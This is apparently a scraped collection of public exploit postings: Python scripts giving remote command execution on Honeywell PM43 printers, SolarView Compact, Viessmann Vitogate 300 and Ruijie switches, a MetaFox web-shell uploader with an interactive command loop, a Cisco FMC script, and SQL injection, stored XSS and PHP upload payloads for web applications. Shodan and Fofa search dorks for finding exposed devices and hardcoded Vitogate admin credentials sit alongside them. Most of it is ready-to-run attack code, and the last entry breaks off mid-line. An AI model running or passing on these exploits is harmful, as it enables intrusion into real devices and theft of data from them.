<pre><code>#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.title:PM43 , PM43<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Frimware Version: versions prior to P10.19.050004<br />#- Tested on: P10.17.019667<br />#- CVE : CVE-2023-3710<br /><br /><br />import requests<br />import argparse<br /><br />BLUE = '\033[94m'<br />YELLOW = '\033[93m'<br />RESET = '\033[0m'<br /><br />def banner():<br /> banner = """<br /> ╔════════════════════════════════════════════════╗<br /> CVE-2023-3710 <br /> Command Injection in Honeywell PM43 Printers<br /> Author: ByteHunter <br /> ╚════════════════════════════════════════════════╝<br /> """<br /> print(YELLOW + banner + RESET)<br /><br /><br />def run_command(url, command):<br /> full_url = f"{url}/loadfile.lp?pageid=Configure"<br /> payload = {<br /> 'username': f'hunt\n{command}\n',<br /> 'userpassword': 'admin12345admin!!'<br /> }<br /> try:<br /> response = requests.post(full_url, data=payload, verify=False)<br /> response_text = response.text<br /> html_start_index = response_text.find('<html>')<br /> if html_start_index != -1:<br /> return response_text[:html_start_index]<br /> else:<br /> return response_text <br /> except requests.exceptions.RequestException as e:<br /> return f"Error: {e}"<br /><br />def main():<br /> parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')<br /> parser.add_argument('--url', dest='url', help='Target URL', required=True)<br /> parser.add_argument('--run', dest='command', help='Command to execute', required=True)<br /><br /> args = parser.parse_args()<br /><br /> response = run_command(args.url, args.command)<br /> print(f"{BLUE}{response}{RESET}")<br /><br />if __name__ == "__main__":<br /> banner()<br /> main()<br /> <br /></code></pre>
<pre><code>#- Exploit Title: SolarView Compact 6.00 - Command Injection<br />#- Shodan Dork: http.html:"solarview compact"<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Version: 6.00<br />#- Tested on: 6.00<br />#- CVE : CVE-2023-23333<br /><br /><br />import argparse<br />import requests<br /><br />def vuln_check(ip_address, port):<br /> url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"<br /> response = requests.get(url)<br /> if response.status_code == 200:<br /> output = response.text<br /> if "root" in output:<br /> print("Vulnerability detected: Command Injection possible.")<br /> print(f"passwd file content:\n{response.text}")<br /><br /><br /> else:<br /> print("No vulnerability detected.")<br /> else:<br /> print("Error: Unable to fetch response.")<br /><br />def main():<br /> parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")<br /> parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)<br /> parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)<br /> args = parser.parse_args()<br /> <br /> ip_address = args.ip<br /> port = args.port<br /> vuln_check(ip_address, port)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.title:'Vitogate 300'<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Version: versions up to 2.1.3.0<br />#- Tested on: 2.1.1.0<br />#- CVE : CVE-2023-5702 & CVE-2023-5222<br /><br /><br />import argparse<br />import requests<br /><br />def banner():<br /> banner = """<br /> ╔═══════════════════════════════════╗<br /> CVE-2023-5702 <br /> Vitogate 300 RCE<br /> Author: ByteHunter <br /> ╚═══════════════════════════════════╝<br /> """<br /><br /> print(banner)<br /><br /><br />def send_post_request(target_ip, command, target_port):<br /> payload = {<br /> "method": "put",<br /> "form": "form-4-7",<br /> "session": "",<br /> "params": {<br /> "ipaddr": f"1;{command}"<br /> }<br /> }<br /><br /> headers = {<br /> "Host": target_ip,<br /> "Content-Length": str(len(str(payload))),<br /> "Content-Type": "application/json"<br /> }<br /><br /> url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"<br /><br /><br /> response = requests.post(url, json=payload, headers=headers)<br /><br /> if response.status_code == 200:<br /> print("Result:")<br /> print(response.text)<br /> else:<br /> print(f"Request failed! status code: {response.status_code}")<br /><br />def main():<br /> parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")<br /> parser.add_argument("--target", required=False, help="Target IP address")<br /> parser.add_argument("--port", required=False, help="Target port",default="80")<br /> parser.add_argument("--command", required=False, help="Command")<br /> parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")<br /><br /> args = parser.parse_args()<br /><br /> if args.creds:<br /> print("Vitogate 300 hardcoded administrative accounts credentials")<br /> print("Username: vitomaster, Password: viessmann1917")<br /> print("Username: vitogate, Password: viessmann")<br /> else:<br /> target_ip = args.target<br /> target_port = args.port<br /> command = args.command<br /><br /> if not (target_ip and command):<br /> print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")<br /> return<br /><br /> send_post_request(target_ip, command,target_port)<br /><br />if __name__ == "__main__":<br /> banner()<br /> main()<br /> <br /></code></pre>
<pre><code>#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.html_hash:-1402735717<br />#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)<br />#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)<br /><br />import http.client<br />import argparse<br /><br />def send_request(ip, port, command):<br /> headers = {<br /> "Host": f"{ip}:{port}",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate, br",<br /> "DNT": "1",<br /> "Connection": "close",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Cmdnum": "1",<br /> "Confirm1": "n",<br /> "Content-Length": "0",<br /> "Command1": command<br /> }<br /><br /> try:<br /> connection = http.client.HTTPConnection(f"{ip}:{port}")<br /> connection.request("GET", "/EXCU_SHELL", headers=headers)<br /> response = connection.getresponse()<br /><br /> <br /> print(f"Status Code: {response.status}")<br /> print(response.read().decode('utf-8'))<br /> connection.close()<br /><br /> except Exception as e:<br /> print(f"Request failed: {e}")<br /><br />if __name__ == "__main__":<br /><br /> parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')<br /> parser.add_argument('--ip', help='Target IP address', required=True)<br /> parser.add_argument('--port', help='Port', required=True)<br /> parser.add_argument('--cmd', help='Command', required=True)<br /> args = parser.parse_args()<br /><br /><br /> ip = args.ip<br /> port = args.port<br /> command = args.cmd<br /><br /><br /> send_request(ip, port, command)<br /> <br /><br /></code></pre>
<pre><code>+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1<br />+ **Date:** 2023-26-12<br />+ **Exploit Author:** Hamdi Sevben<br />+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/<br />+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip<br />+ **Version:** 1.0<br />+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53<br />+ **CVE:** CVE-2023-7137<br /><br />## References: <br />+ **CVE-2023-7137:** https://vuldb.com/?id.249140<br />+ https://www.cve.org/CVERecord?id=CVE-2023-7137<br />+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137<br />+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137<br /><br />## Description:<br />Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.<br /><br />## Proof of Concept:<br />+ Go to the User Login page: "http://localhost/clientdetails/"<br />+ Fill email and password.<br />+ Intercept the request via Burp Suite and send to Repeater.<br />+ Copy and paste the request to a "r.txt" file.<br />+ Captured Burp request:<br />```<br />POST /clientdetails/ HTTP/1.1<br />Host: localhost<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-us,en;q=0.5<br />Cache-Control: no-cache<br />Content-Length: 317<br />Content-Type: application/x-www-form-urlencoded<br />Referer: http://localhost/clientdetails/<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36<br /><br />uemail=user@mail.com&login=LOG+IN&password=P@ass123<br />```<br /><br />+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. <br />```<br />python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db<br />```<br /><br />```<br />---<br />Parameter: uemail (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 7 columns<br /> Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123<br />---<br />[14:58:11] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.53, PHP, PHP 8.1.6<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[14:58:11] [INFO] fetching current database<br />current database: 'loginsystem'<br />```<br /><br />+ current database: `loginsystem`<br />![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport requestsimport sysif len(sys.argv) != 4: sys.exit("Usage: %s " % sys.argv[0]) requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = json.loads(response.text)if not "access_token" in json_response: sys.exit("Login failed!")print("Login success! Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": ("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in json_response["data"][0]: sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded at %s\n" % shell_url)while True: command = input("$ ") response = requests.post(shell_url, data={"command": command}, verify=False) print(response.text)<br /></code></pre>
<pre><code># Exploit Title: [Cisco Firepower Management Center]<br /># Google Dork: [non]<br /># Date: [12/06/2023]<br /># Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)<br /># Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]<br /># CVE : [CVE-2023-20048]<br /><br />import requests<br />import json<br /><br /># set the variables for the URL, username, and password for the FMC web services interface<br />fmc_url = "https://fmc.example.com"<br />fmc_user = "admin"<br />fmc_pass = "cisco123"<br /><br /># create a requests session to handle cookies and certificate verification<br />session = requests.Session()<br />session.verify = False<br /><br /># send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token<br />token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"<br />response = session.post(token_url, auth=(fmc_user, fmc_pass))<br /><br /># check the response status and extract the access token and refresh token from the response headers<br /># set the access token as the authorization header for the subsequent requests<br />try:<br /> if response.status_code == 200:<br /> access_token = response.headers["X-auth-access-token"]<br /> refresh_token = response.headers["X-auth-refresh-token"]<br /> session.headers["Authorization"] = access_token<br /> else:<br /> print("Failed to get tokens, status code: " + str(response.status_code))<br /> exit()<br />except Exception as e:<br /> print(e)<br /> exit()<br /><br /># set the variable for the domain id<br /># change this to your domain id<br />domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"<br /><br /># send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC<br />devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"<br />response = session.get(devices_url)<br /><br /># check the response status and extract the data as a json object<br />try:<br /> if response.status_code == 200:<br /> data = response.json()<br /> else:<br /> print("Failed to get devices, status code: " + str(response.status_code))<br /> exit()<br />except Exception as e:<br /> print(e)<br /> exit()<br /><br /># parse the data to get the list of device names and URLs<br />devices = []<br />for item in data["items"]:<br /> device_name = item["name"]<br /> device_url = item["links"]["self"]<br /> devices.append((device_name, device_url))<br /><br /># loop through the list of devices and send a GET request to the URL of each device to get the device details<br />for device in devices:<br /> device_name, device_url = device<br /> response = session.get(device_url)<br /><br /> # check the response status and extract the data as a json object<br /> try:<br /> if response.status_code == 200:<br /> data = response.json()<br /> else:<br /> print("Failed to get device details, status code: " + str(response.status_code))<br /> continue<br /> except Exception as e:<br /> print(e)<br /> continue<br /><br /> # parse the data to get the device type, software version, and configuration URL<br /> device_type = data["type"]<br /> device_version = data["metadata"]["softwareVersion"]<br /> config_url = data["metadata"]["configURL"]<br /><br /> # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability<br /> # use the values from the affected products section in the security advisory<br /> if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:<br /> print("Device " + device_name + " is vulnerable to CVE-2023-20048")<br /><br /> # create a list of commands that you want to execute on the device<br /> commands = ["show version", "show running-config", "show interfaces"]<br /> device_id = device_url.split("/")[-1]<br /><br /> # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device<br /> # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute<br /> for command in commands:<br /> command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command<br /> response = session.post(command_url)<br /><br /> # check the response status and extract the data as a json object<br /> try:<br /> if response.status_code == 200:<br /> data = response.json()<br /> else:<br /> print("Failed to execute command, status code: " + str(response.status_code))<br /> continue<br /> except Exception as e:<br /> print(e)<br /> continue<br /><br /> # parse the data to get the result of the command execution and print it<br /> result = data["result"]<br /> print("Command: " + command)<br /> print("Result: " + result)<br /><br /> else:<br /> print("Device " + device_name + " is not vulnerable to CVE-2023-20048")<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting<br />Date: 06-Oct-2023<br />Exploit Author: Shahzaib Ali Khan<br />Vendor Homepage: https://snipeitapp.com<br />Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1<br />Version: 6.2.1<br />Tested on: Windows 11 22H2 and Ubuntu 20.04<br />CVE: CVE-2023-5452<br /><br />Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting<br />(XSS) feature that allows attackers to execute JavaScript commands. The<br />location endpoint was vulnerable.<br /><br />Steps to Reproduce:<br /><br />1. Login as a standard user [non-admin] > Asset page > List All<br />2. Click to open any asset > Edit Asset<br />3. Create new location and add the payload:<br /><script>alert(document.cookie)</script><br />4. Now login to any other non-admin or admin > Asset page > List All<br />5. Open the same asset of which you can change the location and the payload<br />will get executed.<br /><br />POC Request:<br /><br />POST /api/v1/locations HTTP/1.1<br />Host: localhost<br />Content-Length: 118<br />Accept: */*<br />X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Origin: http://localhost<br />Referer: http://localhost/hardware/196/edit<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;<br />assetsListingTable.bs.table.cardView=false; laravel_token=<br />eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3<br />ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM<br />d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0<br />01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;<br />XSRF-TOKEN=<br />eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH<br />FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5<br />MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D<br />Connection: close<br /><br />name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=<br /><br /><br /><br />Thanks,<br />Shahzaib Ali Khan<br /></code></pre>
<pre><code>## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using<br />## Author: nu11secur1ty<br />## Date: 03/13/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br />## Description:<br />The upload function and id=cimg parameter are not sanitizing correctly!<br />The attacker can upload any PHP file which he can execute directly on<br />the server!<br /><br />STATUS: HIGH-CrITICAL Vulnerability<br /><br />[+]Payload:<br />```POST<br />POST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Content-Length: 6318<br />sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundarypV7nBYU4nAonvWel<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112<br />Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/mobile_store/admin/?page=system_info<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dg<br />Connection: close<br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="name"<br /><br />Mobile Store Management System - PHP<br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="short_name"<br /><br />MSMS-PHP<br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="about_us"<br /><br /><p style="text-align: center; margin-right: 0px; margin-bottom: 0px;<br />margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:<br />70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:<br />0px; clear: both; border-top: 0px; height: 1px; background-image:<br />linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),<br />rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:<br />0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px<br />-160px; padding: 0px; position: sticky; top: 20px; width: 160px;<br />height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);<br />font-family: "Open Sans", Arial, sans-serif; font-size: 14px;<br />background-color: rgb(255, 255, 255);"></div><div id="bannerR"<br />style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;<br />top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,<br />0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;<br />background-color: rgb(255, 255, 255);"></div><div class="boxed"<br />style="margin: 10px 28.7969px; padding: 0px; clear: both; color:<br />rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:<br />14px; text-align: center; background-color: rgb(255, 255, 255);"><div<br />id="lipsum" style="margin: 0px; padding: 0px; text-align:<br />justify;"></div></div></div><p style="margin-right: 0px;<br />margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum<br />dolor sit amet, consectetur adipiscing elit. Nullam non ultrices<br />tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas<br />iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit<br />vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin<br />lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et<br />malesuada fames ac ante ipsum primis in faucibus. Pellentesque<br />habitant morbi tristique senectus et netus et malesuada fames ac<br />turpis egestas. Praesent eleifend interdum est, at gravida erat<br />molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur<br />et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus<br />porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus<br />sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at<br />lacus vehicula, aliquam purus quis, pharetra lorem.</p><p<br />style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;<br />padding: 0px;">Proin consectetur massa ut quam molestie porta. Donec<br />sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent<br />per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar<br />ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu<br />blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend<br />id, aliquet ut libero. Nunc scelerisque vulputate turpis quis<br />volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum<br />imperdiet, nulla vitae pharetra pretium, magna felis placerat libero,<br />quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper<br />cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien<br />consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae<br />tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,<br />id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;<br />margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id ante<br />vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat<br />turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus<br />pulvinar, eros id ultricies mollis, lectus velit viverra mi, at<br />venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh<br />felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur<br />dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in<br />convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula<br />pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p<br />style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;<br />padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis id<br />cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit<br />ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non<br />lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at<br />pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,<br />vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in<br />tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis<br />dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque<br />mauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;<br />margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quis<br />imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus<br />lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique<br />nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae<br />nisi. Curabitur at quam ut libero convallis mattis vel eget mauris.<br />Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus<br />nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum<br />non magna at, molestie gravida magna. Aenean neque sapien, volutpat a<br />ullamcorper nec, iaculis quis est.</p><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="privacy_policy"<br /><br /><p>Sample Privacy Policy<br></p><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="img"; filename="info.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br /> phpinfo();<br />?><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="cover"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="banners[]"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel--<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)<br /><br />## Time spent:<br />00:05:00<br /><br /><br /></code></pre>
<pre><code>## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/13/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.<br />There is a change in response when nu11secur1ty' or 1=1# is injected.<br />Potential SQLi detected. Please confirm it manually after you check<br />the POST, GET, or other requests... The payload from the<br />puncher_SQLi_bypass_authentication module was submitted successfully<br />after the test. The `search` parameter is vulnerable for Multiple SQLi<br />attacks. The attacker can get all information from the system by using<br />this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: search (GET)<br /> Type: error-based<br /> Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)<br /> Payload: p=products&search=-9068') OR 1 GROUP BY<br />CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0<br />END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 9 columns<br /> Payload: p=products&search=-7515') UNION ALL SELECT<br />2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)<br /><br />## Time spend:<br 